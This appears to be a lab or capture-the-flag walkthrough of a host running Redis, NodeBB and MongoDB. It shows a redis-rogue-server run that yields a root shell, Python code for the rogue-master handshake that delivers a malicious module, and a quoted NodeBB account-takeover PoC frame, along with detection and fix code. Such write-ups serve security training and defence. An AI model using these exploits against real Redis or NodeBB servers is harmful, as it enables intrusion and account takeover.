Starting with a rustscan sweep, handing the nmap options (skip host discovery, default scripts, version detection) through after the -- separator:

rustscan -a $IP -- -Pn -sC -sV

The initial results show five ports open.

Port 22

OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)

Port 80

An HTTP server running nginx 1.10.3.

Port 6379

Redis key-value store 5.0.9

Exploitation

RCE

Searching for exploits we come across https://github.com/n0b0dyCN/redis-rogue-server. The technique it automates is the Redis rogue master attack: the target is told to replicate from an attacker-controlled "master" (SLAVEOF/REPLICAOF), the master answers the replication handshake with a malicious shared object in place of the RDB snapshot, the target writes that file to the path chosen with CONFIG SET dir / dbfilename, and MODULE LOAD then executes it inside redis-server. That gives a shell as whatever user Redis runs as, which here turns out to be root. The preconditions are Redis 4.0 or later (MODULE LOAD), no requirepass, and the CONFIG, SLAVEOF and MODULE commands not renamed or disabled. Let's go ahead and clone this repository to our local Kali host and move into that directory.

┌──(kali㉿kali)-[~]
└─$ git clone https://github.com/n0b0dyCN/redis-rogue-server.git
Cloning into 'redis-rogue-server'...
remote: Enumerating objects: 83, done.
remote: Total 83 (delta 0), reused 0 (delta 0), pack-reused 83
Receiving objects: 100% (83/83), 242.26 KiB | 2.72 MiB/s, done.
Resolving deltas: 100% (19/19), done.

┌──(kali㉿kali)-[~]
└─$ cd redis-rogue-server                  

┌──(kali㉿kali)-[~/redis-rogue-server]
└─$ ls
exp.so  LICENSE  README.md  RedisModulesSDK  redis-rogue-server.py

Following the instructions in the repository, we run redis-rogue-server.py with the target (--rhost/--rport) and our own listener (--lhost/--lport), then choose the interactive shell when prompted.

┌──(kali㉿kali)-[~/redis-rogue-server]
└─$ python3 redis-rogue-server.py --rhost 192.168.120.111 --rport 6379 --lhost 192.168.118.14 --lport 6379
______         _ _      ______                         _____                          
| ___ \       | (_)     | ___ \                       /  ___|                         
| |_/ /___  __| |_ ___  | |_/ /___   __ _ _   _  ___  \ `--.  ___ _ ____   _____ _ __ 
|    // _ \/ _` | / __| |    // _ \ / _` | | | |/ _ \  `--. \/ _ \ '__\ \ / / _ \ '__|
| |\ \  __/ (_| | \__ \ | |\ \ (_) | (_| | |_| |  __/ /\__/ /  __/ |   \ V /  __/ |   
\_| \_\___|\__,_|_|___/ \_| \_\___/ \__, |\__,_|\___| \____/ \___|_|    \_/ \___|_|   
                                     __/ |                                            
                                    |___/                                             
@copyright n0b0dy @ r3kapig

[info] TARGET 192.168.120.111:6379
[info] SERVER 192.168.118.14:6379
[info] Setting master...
[info] Setting dbfilename...
[info] Loading module...
[info] Temerory cleaning up...
What do u want, [i]nteractive shell or [r]everse shell: i
[info] Interact mode start, enter "exit" to quit.
[<<] id
[>>] =uid=0(root) gid=0(root) groups=0(root)
[<<] whoami
[>>] root
[<<] 

Success! We have a root shell on the target: the module executes inside the redis-server process, and this instance was started as root. On a hardened host the same attack would at most yield the redis user, and requirepass, protected mode, or a renamed MODULE/CONFIG/SLAVEOF command would stop it before the module is ever written.
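What the tool is doing on the wire, as an added illustration (this is not the redis-rogue-server code itself; the hosts, ports, replication id and module bytes are constructed placeholders): the RESP encoding of the commands sent to the target, a preflight classification of the target's reply so you know before the sync whether the route is open, and the master-side replication handshake that delivers the .so as a fake RDB snapshot.

```python
"""Model of the Redis "rogue master" RCE route that redis-rogue-server.py
automates.  Added example, not the tool's own code: hosts, ports, the
replication id and the module bytes are constructed placeholders."""

import socket


def resp_encode(*args) -> bytes:
    """Encode one command as a RESP array of bulk strings, the wire format
    redis-cli and every client library use."""
    parts = [b"*%d\r\n" % len(args)]
    for arg in args:
        raw = arg if isinstance(arg, bytes) else str(arg).encode()
        parts.append(b"$%d\r\n%s\r\n" % (len(raw), raw))
    return b"".join(parts)


def attack_commands(lhost: str, lport: int, path: str = "/tmp",
                    filename: str = "exp.so") -> list:
    """The command sequence the exploit drives on the victim, in order.
    The rogue master must serve the sync between steps 3 and 4, since
    MODULE LOAD needs the file on disk first."""
    return [
        resp_encode("SLAVEOF", lhost, lport),                  # Setting master...
        resp_encode("CONFIG", "SET", "dir", path),             # Setting dbfilename...
        resp_encode("CONFIG", "SET", "dbfilename", filename),
        resp_encode("MODULE", "LOAD", f"{path}/{filename}"),   # Loading module...
        resp_encode("SLAVEOF", "NO", "ONE"),                   # cleaning up
        resp_encode("CONFIG", "SET", "dbfilename", "dump.rdb"),
    ]


def classify_reply(raw: bytes) -> str:
    """Read the victim's reply to a write command such as CONFIG SET and say
    whether the rogue-master route is open before starting the attack."""
    if raw.startswith(b"+OK"):
        return "writable"
    if raw.startswith(b"-NOAUTH"):
        return "auth-required"       # requirepass is set
    if raw.startswith(b"-DENIED"):
        return "protected-mode"      # protected-mode yes, non-local client
    if raw.startswith(b"-ERR unknown command"):
        return "command-disabled"    # rename-command hid CONFIG/SLAVEOF/MODULE
    return "other"


class RogueMaster:
    """Answers the replica-side handshake.  The victim, now a replica, sends
    PING, REPLCONF and PSYNC; on PSYNC the master replies +FULLRESYNC and a
    bulk string that Redis writes verbatim to dir/dbfilename.  We hand it
    the .so instead of an RDB snapshot."""

    def __init__(self, payload: bytes):
        self.payload = payload
        self.synced = False

    def respond(self, data: bytes) -> bytes:
        text = data.upper()
        if b"PING" in text:
            return b"+PONG\r\n"
        if b"REPLCONF" in text:          # checked before SYNC: "capa psync2"
            return b"+OK\r\n"
        if b"SYNC" in text:              # matches both SYNC and PSYNC
            self.synced = True
            header = b"+FULLRESYNC " + b"Z" * 40 + b" 1\r\n"  # constructed replid/offset
            return header + b"$%d\r\n" % len(self.payload) + self.payload + b"\r\n"
        return b"-ERR unknown command\r\n"


def serve_rogue_master(lhost: str, lport: int, payload: bytes) -> None:
    """Listen once on --lhost/--lport, run the handshake, then close."""
    master = RogueMaster(payload)
    with socket.socket() as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((lhost, lport))
        srv.listen(1)
        conn, _ = srv.accept()
        with conn:
            while not master.synced:
                data = conn.recv(4096)
                if not data:
                    break
                conn.sendall(master.respond(data))
```

Run classify_reply on the answer to a harmless CONFIG SET before anything else: "writable" means the sequence above will work, and each of the other outcomes names the control that is blocking it.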

Port 8080

nmap labels the service as http-proxy. The application served here is the NodeBB forum targeted by the following exploit, which lets any registered user change the administrator's password:

# Exploit Title:  NodeBB Forum 1.12.2-1.14.2 - Account Takeover
# Date: 2020-08-18
# Exploit Author: Muhammed Eren Uygun
# Vendor Homepage: https://nodebb.org/
# Software Link: https://github.com/NodeBB/NodeBB
# Version: 1.12.2-1.14.2
# Tested on: Linux
# CVE : CVE-2020-15149 - https://github.com/NodeBB/NodeBB/security/advisories/GHSA-hr66-c8pg-5mg7
Impact:
----------------------
A bug in this validation logic made it possible to change the password of any user on a running NodeBB forum by sending a specially crafted socket.io call to the server. This could lead to privilege escalation via an account takeover.
 
Bug PoC:
----------------------
Blog: https://medium.com/bugbountywriteup/privilege-escalation-via-account-takeover-on-nodebb-forum-software-512-a593a7b1b4a4
1- Create a user
2- Go to password change page
3- Change password with proxy
427["user.changePassword",{"currentPassword":"Test.12345!","newPassword":"Admin123!","uid":5}]
4- Replace the uid on the request with 1, which is the uid value of the admin user, and send the request.
5- Now you can log in to the admin user with this password.
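To make the frame format concrete and to have something to run over proxy or server logs, here is an added example (not the exploit's or NodeBB's code; the log entries and uids are constructed): a parser for socket.io EVENT frames of the kind shown above, a check that flags user.changePassword calls whose payload uid differs from the uid the session is authenticated as, and the authorization rule a fixed handler has to enforce.

```python
"""socket.io EVENT frames as seen in the NodeBB exploit and a check for the
uid mismatch it abuses.  Added example, not NodeBB's code; the log below is
constructed."""

import json
import re

# engine.io MESSAGE ('4') + socket.io EVENT ('2'), an optional ack id, then a
# JSON array: [event_name, ...arguments]
_EVENT_FRAME = re.compile(r"^42(?P<ack>\d*)(?P<body>\[.*\])$", re.S)


def parse_event_frame(frame: str):
    """Return {"ack", "event", "args"} for an EVENT frame, else None."""
    m = _EVENT_FRAME.match(frame)
    if not m:
        return None
    body = json.loads(m.group("body"))
    if not body or not isinstance(body[0], str):
        return None
    ack = int(m.group("ack")) if m.group("ack") else None
    return {"ack": ack, "event": body[0], "args": body[1:]}


def password_change_target(frame: str):
    """The uid a user.changePassword call asks the server to act on, or None."""
    ev = parse_event_frame(frame)
    if not ev or ev["event"] != "user.changePassword" or not ev["args"]:
        return None
    data = ev["args"][0]
    return data.get("uid") if isinstance(data, dict) else None


def is_uid_mismatch(session_uid: int, frame: str) -> bool:
    """The bug: the server trusted the client-supplied uid instead of the uid
    bound to the socket session.  Flag any frame where the two differ."""
    target = password_change_target(frame)
    if target is None:
        return False
    try:
        return int(target) != int(session_uid)
    except (TypeError, ValueError):
        return True  # a non-numeric uid is not the session's uid either


def flag_frames(log):
    """log is an iterable of (session_uid, frame); return the suspicious ones."""
    return [(uid, frame) for uid, frame in log if is_uid_mismatch(uid, frame)]


def authorize_password_change(session_uid: int, data: dict,
                              is_admin: bool = False) -> bool:
    """Server-side rule a fixed handler enforces: a non-admin may only change
    the password of the account the socket is authenticated as, and the
    currentPassword check must be made against that same account."""
    target = data.get("uid", session_uid)
    try:
        target = int(target)
    except (TypeError, ValueError):
        return False
    return target == session_uid or is_admin


# Constructed proxy log: (session uid, frame sent).  The second entry is the
# attack from the exploit text: uid 5's session asking to set uid 1's password.
SAMPLE_LOG = [
    (5, '427["user.changePassword",{"currentPassword":"Test.12345!","newPassword":"Admin123!","uid":5}]'),
    (5, '428["user.changePassword",{"currentPassword":"Test.12345!","newPassword":"Admin123!","uid":1}]'),
    (5, '42["user.updateProfile",{"uid":5,"fullname":"test"}]'),
    (5, "3"),  # engine.io pong, not an EVENT frame
]
```

The session uid has to come from the server's own view of the socket (what authenticated the connection), never from the frame; that is the whole difference between the vulnerable logic and authorize_password_change.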
            

Port 27017

MongoDB 4.0.18.